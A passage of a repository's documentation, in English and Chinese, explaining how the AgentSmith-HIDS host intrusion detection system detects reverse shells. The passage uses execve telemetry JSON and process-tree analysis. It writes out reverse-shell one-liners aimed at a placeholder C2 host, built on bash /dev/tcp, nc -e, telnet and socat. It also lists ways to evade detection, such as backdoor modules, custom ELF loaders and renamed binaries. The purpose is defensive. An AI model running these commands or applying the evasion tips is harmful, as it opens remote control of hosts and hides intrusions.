c2_ip c2_port`\n\nLet's follow the previous ideas to see what the stdin and stdout of the bash process look like, and whether there are obvious input and output points to the network connection:\n\n![5](5.png)\n\n![6](6.png)\n\nUnfortunately, it is not the same case like the one above. However, we can still use following inforamtion to detect it:\n\n* argv is `nc -e`\n* bash's parent process is `nc`\n* The bash process or its parent process has an abnormal network connection\n* Track the stdin / out pipe and try to detect if the process of the final pipe connection generated an abnormal network connection\n\nThat seems a bit exhausting, while if you are using AgentSmith-HIDS, there are other detection methods, we will talk about later.\n\n\n\n#### 5.Advanced Version(1)\n\n`telnet c2_ip c2_port 0 SOME_DEVNAME`\n\n![7](7.png)\n\nLet's look at the stdin/stdout of the bash process:\n\n![8](8.png)\n\n\n\n#### 5.Advanced version(2)\n\n`socat exec: 'bash -li', pty, stderr, setid, sigint, sane tcp: c2_ip: c2_port`\n\n![9](9.png)\n\nLet's look at the stdin/stdout of the bash process:\n\n![10](10.png)\n\n\n\n\n\n#### 6. Other backdoor implementations\n\nHere is an example using MSF backdoor:\n\n![11](11.png)\n\nWell, if there is no bash process at all, the traditional approach will obviously fail here.\n\nThis kind of scenario happens a lot, because in nature **bash** is a **for{ execve() }**.\n\n\n\n#### 7. Let's talk about how to bypass traditional detection methods\n\n* You can use the advanced methods mentioned above\n* Use mature backdoors, such as msf, apache backdoor module and nginx backdoor module, etc.\n* Implement elf loader yourself\n* Obfuscate the file name, process name, and/or md5 of the tool or binary file used by the reverse shell, such as nc/bash etc. You can also avoid detection by compiling your own source code\n* and many more......\n\n\n\n#### 8. Summarize the characteristics of the rebound shell\n\nNow we can see that the reverse shell is actually a behavior that is very difficult to be fully detected, because its essence is: **execution of execve or something under remote control**. According to the traditional approach, we focus on the input and output of **bash**, but **determining it is a bash** is something **impossible and meaningless**, since it can be easily to be bypassed if we only look at process name and/or file name. Secondly, bash is not necessarily the only option for hackers.\n\nThankfully, we still have a glimmer of hope to achieve a more comprehensive detection. Let's try to summarize and sort it out:\n\n* The reverse shell is usually somebody executes something on a compromised host remotely\n* Most of the execution is via execve syscall (of course there is still a small part of cases isn't)\n* In nature, the execve creates a new process. For example, when we execute 'ls' in bash, bash is the parent process, 'ls' is the child process, and it is the newly created process\n* The child process inherits the file descriptor(fd) of the parent process (not definately but most of the time it does)\n* From the above points, we can infer that we can switch from **observing an abnormal bash** to **observing an abnormal process**, because parent and child processes have file descriptor inheritance\n\n\n\n#### 9. How to use AgentSmith-HIDS to detect a reverse shell\n\nAccording to the above examples and inference, the detection methods can be:\n\n* Traditional detection approach, such as: abnormal stdin/stdout in the bash process, or abnormal argv, or an abnormal network connection in the bash process tree, etc.\n* Locate a few binary files that are **most likely to be used by intruders if there is a reverse shell** and **Normally the most likely binary files are used under ssh login**, such as ls/cat/ip, etc. If the **stdin/stdout** and **tty** of these processes are found to be inconsistent, you got an alarm generated\n* Locate a few binary files that are **most likely to be used by intruders if there is a reverse shell** and **Normally the most likely binary files are used under ssh login**, such as ls/cat/ip, etc. If the **dip/dport/sip/sport** and **SSH_CONNECTION** of these processes are found inconsistent, once again you got an alarm generated\n\n\n\nIf you find a case or receive an alarm of reverse shell, and you are lucky, **dip/dport/sip/sport** will tell you some valuable information, of course on the contrary, it may also be worthless, and you need to manually check for more evidence yourself (such as: advanced version 1 Happening).\n\n\n\nFollowing are some examples, all with execution of 'ls', you can mainly observe **stdin/out** and **tty_name**, **dip/dport/sip/sport**, **socket_process_pid/socket_process_exe** And **SSH_CONNECTION**:\n\n\n\n**\"The easiest reverse shell(2)\" AgentSmith-HIDS Execve Data:**\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"59\",\n \"run_path\":\"/usr/bin/ls\",\n \"exe\":\"/usr/bin/ls\",\n \"argv\":\"ls \",\n \"pid\":\"25131\",\n \"ppid\":\"25118\",\n \"pgid\":\"25117\",\n \"tgid\":\"25131\",\n \"comm\":\"ls\",\n \"nodename\":\"test\",\n \"stdin\":\"pipe:[93621]\",\n \"stdout\":\"pipe:[93622]\",\n \"sessionid\":\"11\",\n \"dip\":\"127.0.0.1\",\n \"dport\":\"233\",\n \"sip\":\"127.0.0.1\",\n \"sport\":\"36246\",\n \"sa_family\":\"2\",\n \"pid_tree\":\"1(systemd)->1565(sshd)->16471(sshd)->16475(bash)->25086(fish)->25117(nc)->25118(bash)->25131(ls)\",\n \"tty_name\":\"pts0\",\n \"socket_process_pid\":\"25131\",\n \"socket_process_exe\":\"/usr/bin/ls\",\n \"SSH_CONNECTION\":\"192.168.165.1 64289 192.168.165.152 22\",\n \"LD_PRELOAD\":\"\",\n \"user\":\"root\",\n \"time\":\"1580122709834\",\n \"local_ip\":\"192.168.165.152\",\n \"hostname\":\"test\",\n \"exe_md5\":\"a0c32dd6d3bc4d364380e2e65fe9ac64\",\n \"socket_process_exe_md5\":\"a0c32dd6d3bc4d364380e2e65fe9ac64\"\n}\n```\n\n\n\n**\"Advanced Version(1)\" AgentSmith-HIDS Execve Data:**\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"59\",\n \"run_path\":\"/usr/bin/ls\",\n \"exe\":\"/usr/bin/ls\",\n \"argv\":\"ls \",\n \"pid\":\"25503\",\n \"ppid\":\"25495\",\n \"pgid\":\"25494\",\n \"tgid\":\"25503\",\n \"comm\":\"ls\",\n \"nodename\":\"test\",\n \"stdin\":\"pipe:[94503]\",\n \"stdout\":\"/dev/pts/0\",\n \"sessionid\":\"11\",\n \"dip\":\"192.168.165.1\",\n \"dport\":\"64289\",\n \"sip\":\"192.168.165.152\",\n \"sport\":\"22\",\n \"sa_family\":\"1\",\n \"pid_tree\":\"1(systemd)->1565(sshd)->16471(sshd)->16475(bash)->25086(fish)->25473(bash)->25495(bash)->25503(ls)\",\n \"tty_name\":\"pts0\",\n \"socket_process_pid\":\"16471\",\n \"socket_process_exe\":\"/usr/sbin/sshd\",\n \"SSH_CONNECTION\":\"192.168.165.1 64289 192.168.165.152 22\",\n \"LD_PRELOAD\":\"\",\n \"user\":\"root\",\n \"time\":\"1580123032502\",\n \"local_ip\":\"192.168.165.152\",\n \"hostname\":\"test\",\n \"exe_md5\":\"a0c32dd6d3bc4d364380e2e65fe9ac64\",\n \"socket_process_exe_md5\":\"686cd72b4339da33bfb6fe8fb94a301f\"\n}\n```\n\n\n\n**\"Advanced Version(2)\" AgentSmith-HIDS Execve Data:**\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"59\",\n \"run_path\":\"/usr/bin/ls\",\n \"exe\":\"/usr/bin/ls\",\n \"argv\":\"ls --color=auto \",\n \"pid\":\"24697\",\n \"ppid\":\"24676\",\n \"pgid\":\"24697\",\n \"tgid\":\"24697\",\n \"comm\":\"ls\",\n \"nodename\":\"test\",\n \"stdin\":\"/dev/pts/4\",\n \"stdout\":\"/dev/pts/4\",\n \"sessionid\":\"11\",\n \"dip\":\"127.0.0.1\",\n \"dport\":\"233\",\n \"sip\":\"127.0.0.1\",\n \"sport\":\"36150\",\n \"sa_family\":\"2\",\n \"pid_tree\":\"1(systemd)->1565(sshd)->16471(sshd)->16475(bash)->16490(fish)->24675(socat)->24676(bash)->24697(ls)\",\n \"tty_name\":\"pts4\",\n \"socket_process_pid\":\"24675\",\n \"socket_process_exe\":\"/usr/bin/socat\",\n \"SSH_CONNECTION\":\"192.168.165.1 64289 192.168.165.152 22\",\n \"LD_PRELOAD\":\"\",\n \"user\":\"root\",\n \"time\":\"1580122431825\",\n \"local_ip\":\"192.168.165.152\",\n \"hostname\":\"test\",\n \"exe_md5\":\"a0c32dd6d3bc4d364380e2e65fe9ac64\",\n \"socket_process_exe_md5\":\"f639a31fa3050bc78868d35b46390536\"\n}\n```\n\n\n\n**\"MSF backdoor\" AgentSmith-HIDS Execve Data:**\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"59\",\n \"run_path\":\"/usr/bin/ls\",\n \"exe\":\"/usr/bin/ls\",\n \"argv\":\"ls \",\n \"pid\":\"24587\",\n \"ppid\":\"18303\",\n \"pgid\":\"18289\",\n \"tgid\":\"24587\",\n \"comm\":\"ls\",\n \"nodename\":\"test\",\n \"stdin\":\"pipe:[88900]\",\n \"stdout\":\"pipe:[88901]\",\n \"sessionid\":\"11\",\n \"dip\":\"192.168.165.152\",\n \"dport\":\"233\",\n \"sip\":\"192.168.165.152\",\n \"sport\":\"46852\",\n \"sa_family\":\"2\",\n \"pid_tree\":\"1(systemd)->1565(sshd)->16471(sshd)->16475(bash)->16490(fish)->18289(backdoor)->18303(sh)->24587(ls)\",\n \"tty_name\":\"pts0\",\n \"socket_process_pid\":\"18289\",\n \"socket_process_exe\":\"/root/backdoor\",\n \"SSH_CONNECTION\":\"192.168.165.1 64289 192.168.165.152 22\",\n \"LD_PRELOAD\":\"\",\n \"user\":\"root\",\n \"time\":\"1580122376221\",\n \"local_ip\":\"192.168.165.152\",\n \"hostname\":\"test\",\n \"exe_md5\":\"a0c32dd6d3bc4d364380e2e65fe9ac64\",\n \"socket_process_exe_md5\":\"1bc2f057dab264291f7e3117ebc2d50e\"\n}\n```\n\n\n\n#### 10. Summary\n\nCan it still be bypassed? The answer is possible. There are still ways there to bypass it. But don't worry, only one Hook information of AgentSmith-HIDS is used for detection today, there are many others for us to detect intrusion behavior from different dimensions, so stay tuned." }, { "path": "doc/How-to-use-AgentSmith-HIDS-to-detect-reverse-shell/如何利用AgentSmith-HIDS检测反弹shell.md", "content": "# 如何利用AgentSmith-HIDS检测反弹shell\n\n反弹shell(reverse shell)是一种历史悠久,且上到APT下到脚本小子都会使用的最常规的一种入侵后行为,作为一款HIDS来讲是必然需要考虑检测的一种入侵行为。但是反弹shell的方式较多,且极为灵活,想要较低漏报/误报的通用检测方法目前还是比较少的。AgentSmth-HIDS作为一款专为入侵检测而生的产品,将会给大家带来一种不一样思路的检测方式。\n\n#### 1.何为反弹shell\n\n当黑客拿到一台服务器的权限时候,往往会因为服务器没有公网IP/防火墙限制等原因没有办法正向的方式进行连接,如SSH等,那么就需要让被入侵的服务器主动将shell送到控制端来进行接管,所以叫**反弹shell**。\n\n![1](1.png)\n\n#### 2.AgentSmith-HIDS的Execve Hook 信息详解\n\n由于本文的主题是利用**AgentSmith-HIDS**来检测反弹shell的,且基本都是利用Execve Hook的信息来进行检测,因此有必要在文章开始的时候仔细讲解一下Execve Hook的信息。\n\n我们先来看一个例子:\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"59\",\n \"run_path\":\"/usr/bin/ls\",\n \"exe\":\"/usr/bin/ls\",\n \"argv\":\"ls --color=auto --indicator-style=classify \",\n \"pid\":\"6766\",\n \"ppid\":\"2202\",\n \"pgid\":\"6766\",\n \"tgid\":\"6766\",\n \"comm\":\"ls\",\n \"nodename\":\"test\",\n \"stdin\":\"/dev/pts/2\",\n \"stdout\":\"/dev/pts/2\",\n \"sessionid\":\"5\",\n \"dip\":\"192.168.165.1\",\n \"dport\":\"50431\",\n \"sip\":\"192.168.165.152\",\n \"sport\":\"22\",\n \"sa_family\":\"1\",\n \"pid_tree\":\"1(systemd)->1565(sshd)->2129(sshd)->2132(bash)->2202(fish)->6766(ls)\",\n \"tty_name\":\"pts2\",\n \"socket_process_pid\":\"2129\",\n \"socket_process_exe\":\"/usr/sbin/sshd\",\n \"SSH_CONNECTION\":\"192.168.165.1 50431 192.168.165.152 22\",\n \"LD_PRELOAD\":\"\",\n \"user\":\"root\",\n \"time\":\"1580104906853\",\n \"local_ip\":\"192.168.165.152\",\n \"hostname\":\"test\",\n \"exe_md5\":\"a0c32dd6d3bc4d364380e2e65fe9ac64\",\n \"socket_process_exe_md5\":\"686cd72b4339da33bfb6fe8fb94a301f\"\n}\n```\n\n部分字段信息及获取来源(其他基础信息就不在赘述了):\n\n| Field | Remark |\n| ------------------------------------- | ------------------------------------------------------------ |\n| nodename | Linux namespace中的nodename,对应到主机名或者是容器的container name等 |\n| stdin/stdout | 进程的标准输入/输出信息 |\n| sessionid | 进程的sessionid信息,可以利用该ID进行聚类溯源分析 |\n| pid_tree | 进程树信息 |\n| dip/dport/sip/sport | **该进程所在进程树的第一个socket指向的4元组信息(从下向上寻找,仅限AF_INET或AF_INET6)** |\n| socket_process_pid/socket_process_exe | 第一个有效的socket的进程的pid及exe信息 |\n| tty_name | 该进程tty信息 |\n| SSH_CONNECTION | 从环境变量中提取,SSH连接信息 |\n| LD_PRELOAD | 从环境变量中提取,LD_PRELOAD信息 |\n\n其中**dip/dport/sip/sport**这些可能有些难以理解,我们用上面的例子来看,通过**exe**和**argv**可以判断是执行了**ls**命令,这时通过**dip/dport/sip/sport**和**socket_process_pid/socket_process_exe**可以发现是指向**sshd**和一个**ssh**的连接,由于**ls**本身并没有网络连接,那么AgentSmith-HIDS就会向上寻找,一直找到存在有效的进程或者到头为止,由于我们执行**ls**是通过**ssh**登陆到这台服务器上进行的操作,那么自然会找到该**ssh**的连接信息。这个和环境变量中的**SSH_CONNECTION**对比也可以发现。\n\n![4](4.png)\n\n需要注意的是,这个信息可能会被干扰,由于性能的考虑,我不能提取全部的socket信息,也没办法遍历每一个进程的全部fd,这些都会成为潜在的限制条件。\n\n\n\n#### 3.最简单的反弹shell\n\n最简单的反弹shell莫过于`bash -i`了,其使用方式如下:\n\n```bash\nbash -i >& /dev/tcp/c2_ip/c2_port 0>&1\n```\n\n其中`-i`这个参数表示的是产生交互式的shell,然后用TCP的接管shell的输入和输出,就可以实现反弹shell,控制端只需要在这之前使用:\n\n```bash\nnc -l port\n```\n\n就可以监听指定端口,等待shell乖乖登门造访了。\n\n![2](2.png)\n\n面对这种最基础的反弹shell,业界的检测思路都非常的统一,即如果存在bash进程的stdin/stdout(标准输入/标准输出)是指向某个socket连接,那么我们就认为该bash极有可能是反弹shell行为。\n\n通常我们查看一个进程的stdin/out可以在`/proc/pid/fd`下面查看,默认0是stdin,1是stdout,2是stderr。\n\n![3](3.png)\n\n这种的检测在AgentSmith-HIDS上非常简单,我们利用execve hook获取的数据即可发现:\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"59\",\n \"run_path\":\"/usr/bin/bash\",\n \"exe\":\"/usr/bin/bash\",\n \"argv\":\"bash -i \",\n \"pid\":\"6364\",\n \"ppid\":\"2549\",\n \"pgid\":\"6364\",\n \"tgid\":\"6364\",\n \"comm\":\"bash\",\n \"nodename\":\"test\",\n \"stdin\":\"socket:[80649]\",\n \"stdout\":\"socket:[80649]\",\n \"sessionid\":\"3\",\n \"dip\":\"127.0.0.1\",\n \"dport\":\"233\",\n \"sip\":\"127.0.0.1\",\n \"sport\":\"60620\",\n \"sa_family\":\"2\",\n \"pid_tree\":\"1(systemd)->1565(sshd)->2093(sshd)->2096(bash)->2147(fish)->2549(bash)->6364(bash)\",\n \"tty_name\":\"pts0\",\n \"socket_process_pid\":\"6364\",\n \"socket_process_exe\":\"/usr/bin/bash\",\n \"SSH_CONNECTION\":\"192.168.165.1 50422 192.168.165.152 22\",\n \"LD_PRELOAD\":\"\",\n \"user\":\"root\",\n \"time\":\"1580104472249\",\n \"local_ip\":\"192.168.165.152\",\n \"hostname\":\"test\",\n \"exe_md5\":\"f926bedd777fa0f4f71dd2d28155862a\",\n \"socket_process_exe_md5\":\"f926bedd777fa0f4f71dd2d28155862a\"\n}\n```\n\n大家注意看exe和stdin和stdout,根据这个特征即可以发现该类型的反弹shell,并且还可以通过**dip/dport/sip/sport**来定位到C2的位置。\n\n其他类似的如大家耳熟能详的python/perl这种就不多赘述演示了,大多数都是将bash的stdin/out指向socket连接,本质没有区别。\n\n\n\n#### 4.最简单的反弹shell(2)\n\n除了`bash -i`这种之外,还有另外一种很常用的方式是使用`nc -e`,使用方式如下:\n\n```bash\nnc -e /usr/bin/bash c2_ip c2_port\n```\n\n我们按照之前的思路来查看一下bash进程的stdin和stdout是什么样子,是不是也是有明显的输入输出指向网络连接的情况:\n\n![5](5.png)\n\n![6](6.png)\n\n很不幸,和之前的状况并不一样,但是我们依然可以利用如:\n\n* argv是`nc -e`\n* bash的父进程是`nc`\n* bash的进程或者其父进程存在异常的网络连接\n* 跟踪stdin/out的pipe,尝试检测最终pipe连接的进程是否具有异常的网络连接\n\n等其他方式来检测,但是如果你是使用AgentSmith-HIDS的话可以有其他的检测方式,我们后面再说。\n\n\n\n#### 5.进阶版本(1)\n\n` telnet c2_ip c2_port 0SOME_DEVNAME`\n\n![7](7.png)\n\n我们看下bash进程的stdin/stdout:\n\n![8](8.png)\n\n\n\n#### 5.进阶版本(2)\n\n`socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:c2_ip:c2_port`\n\n![9](9.png)\n\n我们看下bash进程的stdin/stdout:\n\n![10](10.png)\n\n\n\n#### 6.其他后门实现\n\n这里就用MSF的后门来举例看一下好了:\n\n![11](11.png)\n\n额,如果按照传统思路,根本没有bash进程,传统思路是无法检测的。\n\n这种类似的场景也非常的多,因为本质上**bash**就是一个**for{execve()}**。\n\n\n\n#### 7.我们来聊聊如何绕过传统的检测方式\n\n* 使用上文中提到的进阶方法都可以\n* 使用成熟的后门,如msf/apache后门模块/nginx后门模块等\n* 自己实现elf loader\n* 反弹shell使用的工具或二进制文件进行文件名/进程名/md5的混淆,如nc/bash等等,也可以通过自己源码编译等方式避免检测\n* 等等\n\n\n\n#### 8.总结反弹shell的特点\n\n看到这里我们可以看到反弹shell其实是一种非常难以被完全检测到的行为,因为他的本质其实是:**外部控制情况下执行execve或者执行些什么**,按照传统的检测思路主要放在**bash**的输入输出上,但是**确定bash**本身就是一件**不可能且毫无意义的事情**,因为如果通过进程名/文件名来那么太容易混淆了,其次想要执行些什么不是只能通过bash才可以。\n\n但是我们还是有一丝希望来做到较为全面的检测,接下来我们尝试的总结和梳理一下:\n\n* 反弹shell往往是外部来控制受害机器执行些什么\n\n* 大部分的执行是通过execve syscall的(当然有一小部分可以不需要)\n\n* execve本质是创建一个新进程,比如当我们在bash下执行ls的时候,bash是父进程,ls是子进程,是新被创建出来的进程\n\n* 子进程会继承父进程的文件描述符(不绝对但是大多数情况下是这样的)\n\n* 通过以上几点推断我们可以从**观察异常的bash**转变成**观察异常的进程**,因为父子进程存在文件描述符继承关系\n\n \n\n#### 9.如何使用AgentSmith-HIDS检测反弹shell\n\n根据上面的推断和之前的例子,检测方式有以下几种:\n\n* 传统的检测方式,如:bash进程存在异常的stdin/stdout,或者异常的argv,或者bash的进程树存在异常的网络连接等等就不在赘述了\n* 框定几个如果存在反弹shell则**入侵者大概率会使用的**且**正常情况下大概率是在ssh登陆下才会使用的**二进制文件,如ls/cat/ip等等,如果发现这些进程的**stdin/stdout**和**tty**不一致则告警\n* 框定几个如果存在反弹shell则**入侵者大概率会使用的**且**正常情况下大概率是在ssh登陆下才会使用的**二进制文件,如ls/cat/ip等等,如果发现这些进程的**dip/dport/sip/sport**和**SSH_CONNECTION**不一致则告警\n\n\n\n如果发现了异常,如果幸运的话,**dip/dport/sip/sport**会告诉你一些有价值的信息,当然也可能毫毫无价值,需要自己去手动排查(如:进阶版本1的情况)。\n\n\n\n接下来是一些例子,都是通过执行ls为例,大家可以主要观察**stdin/out**和**tty_name**,**dip/dport/sip/sport**,**socket_process_pid/socket_process_exe**以及**SSH_CONNECTION**:\n\n\n\n**“最简单的反弹shell(2)“的AgentSmith-HIDS Execve数据:**\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"59\",\n \"run_path\":\"/usr/bin/ls\",\n \"exe\":\"/usr/bin/ls\",\n \"argv\":\"ls \",\n \"pid\":\"25131\",\n \"ppid\":\"25118\",\n \"pgid\":\"25117\",\n \"tgid\":\"25131\",\n \"comm\":\"ls\",\n \"nodename\":\"test\",\n \"stdin\":\"pipe:[93621]\",\n \"stdout\":\"pipe:[93622]\",\n \"sessionid\":\"11\",\n \"dip\":\"127.0.0.1\",\n \"dport\":\"233\",\n \"sip\":\"127.0.0.1\",\n \"sport\":\"36246\",\n \"sa_family\":\"2\",\n \"pid_tree\":\"1(systemd)->1565(sshd)->16471(sshd)->16475(bash)->25086(fish)->25117(nc)->25118(bash)->25131(ls)\",\n \"tty_name\":\"pts0\",\n \"socket_process_pid\":\"25131\",\n \"socket_process_exe\":\"/usr/bin/ls\",\n \"SSH_CONNECTION\":\"192.168.165.1 64289 192.168.165.152 22\",\n \"LD_PRELOAD\":\"\",\n \"user\":\"root\",\n \"time\":\"1580122709834\",\n \"local_ip\":\"192.168.165.152\",\n \"hostname\":\"test\",\n \"exe_md5\":\"a0c32dd6d3bc4d364380e2e65fe9ac64\",\n \"socket_process_exe_md5\":\"a0c32dd6d3bc4d364380e2e65fe9ac64\"\n}\n```\n\n\n\n**“进阶版本(1)“的AgentSmith-HIDS Execve数据:**\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"59\",\n \"run_path\":\"/usr/bin/ls\",\n \"exe\":\"/usr/bin/ls\",\n \"argv\":\"ls \",\n \"pid\":\"25503\",\n \"ppid\":\"25495\",\n \"pgid\":\"25494\",\n \"tgid\":\"25503\",\n \"comm\":\"ls\",\n \"nodename\":\"test\",\n \"stdin\":\"pipe:[94503]\",\n \"stdout\":\"/dev/pts/0\",\n \"sessionid\":\"11\",\n \"dip\":\"192.168.165.1\",\n \"dport\":\"64289\",\n \"sip\":\"192.168.165.152\",\n \"sport\":\"22\",\n \"sa_family\":\"1\",\n \"pid_tree\":\"1(systemd)->1565(sshd)->16471(sshd)->16475(bash)->25086(fish)->25473(bash)->25495(bash)->25503(ls)\",\n \"tty_name\":\"pts0\",\n \"socket_process_pid\":\"16471\",\n \"socket_process_exe\":\"/usr/sbin/sshd\",\n \"SSH_CONNECTION\":\"192.168.165.1 64289 192.168.165.152 22\",\n \"LD_PRELOAD\":\"\",\n \"user\":\"root\",\n \"time\":\"1580123032502\",\n \"local_ip\":\"192.168.165.152\",\n \"hostname\":\"test\",\n \"exe_md5\":\"a0c32dd6d3bc4d364380e2e65fe9ac64\",\n \"socket_process_exe_md5\":\"686cd72b4339da33bfb6fe8fb94a301f\"\n}\n```\n\n\n\n**“进阶版本(2)“的AgentSmith-HIDS Execve数据:**\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"59\",\n \"run_path\":\"/usr/bin/ls\",\n \"exe\":\"/usr/bin/ls\",\n \"argv\":\"ls --color=auto \",\n \"pid\":\"24697\",\n \"ppid\":\"24676\",\n \"pgid\":\"24697\",\n \"tgid\":\"24697\",\n \"comm\":\"ls\",\n \"nodename\":\"test\",\n \"stdin\":\"/dev/pts/4\",\n \"stdout\":\"/dev/pts/4\",\n \"sessionid\":\"11\",\n \"dip\":\"127.0.0.1\",\n \"dport\":\"233\",\n \"sip\":\"127.0.0.1\",\n \"sport\":\"36150\",\n \"sa_family\":\"2\",\n \"pid_tree\":\"1(systemd)->1565(sshd)->16471(sshd)->16475(bash)->16490(fish)->24675(socat)->24676(bash)->24697(ls)\",\n \"tty_name\":\"pts4\",\n \"socket_process_pid\":\"24675\",\n \"socket_process_exe\":\"/usr/bin/socat\",\n \"SSH_CONNECTION\":\"192.168.165.1 64289 192.168.165.152 22\",\n \"LD_PRELOAD\":\"\",\n \"user\":\"root\",\n \"time\":\"1580122431825\",\n \"local_ip\":\"192.168.165.152\",\n \"hostname\":\"test\",\n \"exe_md5\":\"a0c32dd6d3bc4d364380e2e65fe9ac64\",\n \"socket_process_exe_md5\":\"f639a31fa3050bc78868d35b46390536\"\n}\n```\n\n\n\n**“msf后门“的AgentSmith-HID Execve数据:**\n\n```json\n{\n \"uid\":\"0\",\n \"data_type\":\"59\",\n \"run_path\":\"/usr/bin/ls\",\n \"exe\":\"/usr/bin/ls\",\n \"argv\":\"ls \",\n \"pid\":\"24587\",\n \"ppid\":\"18303\",\n \"pgid\":\"18289\",\n \"tgid\":\"24587\",\n \"comm\":\"ls\",\n \"nodename\":\"test\",\n \"stdin\":\"pipe:[88900]\",\n \"stdout\":\"pipe:[88901]\",\n \"sessionid\":\"11\",\n \"dip\":\"192.168.165.152\",\n \"dport\":\"233\",\n \"sip\":\"192.168.165.152\",\n \"sport\":\"46852\",\n \"sa_family\":\"2\",\n \"pid_tree\":\"1(systemd)->1565(sshd)->16471(sshd)->16475(bash)->16490(fish)->18289(backdoor)->18303(sh)->24587(ls)\",\n \"tty_name\":\"pts0\",\n \"socket_process_pid\":\"18289\",\n \"socket_process_exe\":\"/root/backdoor\",\n \"SSH_CONNECTION\":\"192.168.165.1 64289 192.168.165.152 22\",\n \"LD_PRELOAD\":\"\",\n \"user\":\"root\",\n \"time\":\"1580122376221\",\n \"local_ip\":\"192.168.165.152\",\n \"hostname\":\"test\",\n \"exe_md5\":\"a0c32dd6d3bc4d364380e2e65fe9ac64\",\n \"socket_process_exe_md5\":\"1bc2f057dab264291f7e3117ebc2d50e\"\n}\n```\n\n\n\n#### 10.总结\n\n还能不能绕过呢?还是可以的,还有不少方法可以绕过。不过不必担心,今天只用到了AgentSmith-HIDS的一个Hook信息进行判断而已,还有其他的不少数据供我们从不同维度检测入侵行为,敬请期待。" } ]